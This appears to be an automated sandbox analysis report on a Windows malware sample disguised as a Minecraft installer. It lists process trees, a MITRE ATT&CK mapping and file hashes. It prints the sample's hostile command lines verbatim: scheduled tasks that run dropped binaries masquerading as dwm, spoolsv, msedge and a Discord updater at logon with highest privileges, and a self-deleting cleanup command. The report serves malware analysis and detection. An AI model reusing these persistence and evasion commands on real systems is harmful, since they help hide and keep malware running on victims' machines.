    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 6060)
        cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    [3] C:\Windows\System32\Wbem\wmic.exe (PID 4820)
        cmdline: "wmic" path win32_VideoController get name
        - Detects videocard installed
    [3] C:\Windows\SYSTEM32\cmd.exe (PID 3984)
        cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe" && pause
      [4] C:\Windows\system32\PING.EXE (PID 5312)
          cmdline: ping localhost
          - Runs ping.exe
[1] C:\Windows\system32\schtasks.exe (PID 2432)
    cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe (PID 1492)
    cmdline: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe (PID 3044)
    cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe (PID 3132)
    cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe (PID 4328)
    cmdline: schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe (PID 3640)
    cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe (PID 4032)
    cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Internet Explorer\it-IT\spoolsv.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    cmdline: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\it-IT\spoolsv.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Internet Explorer\it-IT\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Pictures\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default\Pictures\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Pictures\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 12 /tr "'C:\Program Files\7-Zip\Lang\msedge.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:216
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UpdaterU" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Roaming\Discord\Updater.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Updater" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\Discord\Updater.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UpdaterU" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Roaming\Discord\Updater.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4340,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:81⤵
- Executes dropped EXE
PID:2136
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5940
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5380
-
C:\Windows\System32\jpzkqk.exe"C:\Windows\System32\jpzkqk.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:228 -
C:\Recovery\WindowsRE\dwm.exe"C:\Recovery\WindowsRE\dwm.exe"2⤵
- Executes dropped EXE
PID:5136
-
-
C:\windows\system32\jpzkqk.exe.exe"C:\windows\system32\jpzkqk.exe.exe"2⤵PID:1168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5012 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb67eab58,0x7ffcb67eab68,0x7ffcb67eab782⤵PID:2992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:22⤵PID:5900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:2800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2288 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:2464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2868 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:12⤵PID:5324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2880 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:12⤵PID:5788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4340 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:12⤵PID:6100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:5916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:5184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:3616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:22⤵PID:2960
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe"C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe"1⤵
- Executes dropped EXE
PID:380
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3244,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4352 /prefetch:81⤵
- Executes dropped EXE
PID:2204
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe"1⤵PID:3832
-
C:\Users\Default\Pictures\fontdrvhost.exeC:\Users\Default\Pictures\fontdrvhost.exe1⤵
- Executes dropped EXE
PID:5068
-
C:\Program Files\7-Zip\Lang\msedge.exe"C:\Program Files\7-Zip\Lang\msedge.exe"1⤵
- Executes dropped EXE
PID:1088
-
C:\Users\Admin\AppData\Roaming\Discord\Updater.exeC:\Users\Admin\AppData\Roaming\Discord\Updater.exe1⤵
- Executes dropped EXE
PID:1888
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
PID:5968
-
C:\Recovery\WindowsRE\dwm.exeC:\Recovery\WindowsRE\dwm.exe1⤵
- Executes dropped EXE
PID:2316
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3888 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb67eab58,0x7ffcb67eab68,0x7ffcb67eab782⤵PID:4264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:22⤵PID:1528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:1360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:4352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:12⤵PID:5444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:12⤵PID:3144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:12⤵PID:228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4488 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:4508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4500 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:5372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4652 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:1848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4800 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:5788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1888 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:22⤵PID:5412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4812 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:12⤵PID:2988
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:5784
-
C:\Recovery\WindowsRE\TextInputHost.exeC:\Recovery\WindowsRE\TextInputHost.exe1⤵
- Executes dropped EXE
PID:2212
-
C:\Program Files\Internet Explorer\it-IT\spoolsv.exe"C:\Program Files\Internet Explorer\it-IT\spoolsv.exe"1⤵
- Executes dropped EXE
PID:3604
-
C:\Users\Default\Pictures\fontdrvhost.exeC:\Users\Default\Pictures\fontdrvhost.exe1⤵
- Executes dropped EXE
PID:5704
-
C:\Program Files\7-Zip\Lang\msedge.exe"C:\Program Files\7-Zip\Lang\msedge.exe"1⤵
- Executes dropped EXE
PID:4932
-
C:\Users\Admin\AppData\Roaming\Discord\Updater.exeC:\Users\Admin\AppData\Roaming\Discord\Updater.exe1⤵
- Executes dropped EXE
PID:2388
-
C:\Recovery\WindowsRE\dwm.exeC:\Recovery\WindowsRE\dwm.exe1⤵
- Executes dropped EXE
PID:2248
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Defense Evasion
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Modify Registry (2)
Downloads
-
Filesize
4KB
MD53affd9d207b40f2dfe5013210a06bd9f
SHA1025dc5927f1cea51732805178be9bde64920cc72
SHA256d9eb97de583fd3ee755f11e95965fbf7b1aa7ec0f45ed37195a9fe22ab3abf54
SHA512f7e0c4146193222740358e77949d0dfcbcf50a921c056fd8fc01552fb177c4e9e39dd36c8ed25cf48c88d4c614b803ef51b23b5e80a9c68384f389ec5b187783
-
Filesize
1KB
MD5b5189fb271be514bec128e0d0809c04e
SHA15dd625d27ed30fca234ec097ad66f6c13a7edcbe
SHA256e1984ba1e3ff8b071f7a320a6f1f18e1d5f4f337d31dc30d5bdfb021df39060f
SHA512f0fcb8f97279579beb59f58ea89527ee0d86a64c9de28300f14460bec6c32dda72f0e6466573b6654a1e992421d6fe81ae7cce50f27059f54cf9fdca6953602e
-
Filesize
361B
MD5d16806056e8be33a7560ab4eb0029dd8
SHA157fa6d47eccc8015635970221da0e01ff704948c
SHA256bdbc0ae078c865a05239776be950be4ce7ad5829df33776db13fafd9c4c27a30
SHA5123ed6ca5fa1319688f1a141c169201f4780c1baf0c89a614fd8ac0117536fc6bc479e425206fde6e59b278e965731d76a8ce616132b72a3406ebdd3d6f939eaa5
-
Filesize
235B
MD53ba276e6262d5e7dc4eab90c1e8933e2
SHA1439d3487c8acd999804bfe28e728fe7d16b1b345
SHA256ee497148cd8a49defb9e78f00d41c88e05823b3c23c45af8e5da08aa7394d0a7
SHA5126d93936712009903827b9fef765dfd667b527311232a4149ad1495397f4669ec17f1894aa26e146e4c1b594a74b02e9d70f7a2473f3c2b5d6bd1907c6062f22b
-
Filesize
391B
MD5e51427de2b43768ba0a9fcd5ab991896
SHA16c73627d61c3d634d4ef76adae0c2f57474b67a4
SHA2566f0b9891c54df11b2146977266f4f915f84fbddb243cd344fc1aea924fc48ce1
SHA512649fd9a82cd34c4bf0f64e4043acfdcedab08ded11bb3be24d1c2102a11d837fc5054ea9798f6964a8cca8ef3a53bde138a1b307676697e38d89d0ddb1fea30f
-
Filesize
265B
MD5545ca94bfe9fab708ac8e4ab8f324508
SHA1eb0b661383a6c13717ff5d6eec3640a6bfe63fe2
SHA2564b4760bfda811dfd5ed5749edd0eb05b0000f57da33d101a521dde19eb281757
SHA51259d86e751f81c3d376de4ee4993ceafad4bc5620ceea919548c44e3755a711f2dcdbf4410dec2f9391512548202bfe65171ed71d0d5767b24e4f989fbbafdeb9
-
Filesize
1KB
MD501dc60b32f9121b11b30ff8d8e3ed9bd
SHA1d4c7beabbb4b96239ff85348a9cd1957a10c27ab
SHA256bbedf7b9680a97b0ebd09540310951791296334e7d8a3056b73ad564c55556ea
SHA5120bc2dfe0549f8f0fc70c68df1fc61abf21f0c05954220ab1df7375d15f9a4d332cdccb5aefdef705a88f801c9e5e792815287f27674263db7dcb6a2f086429be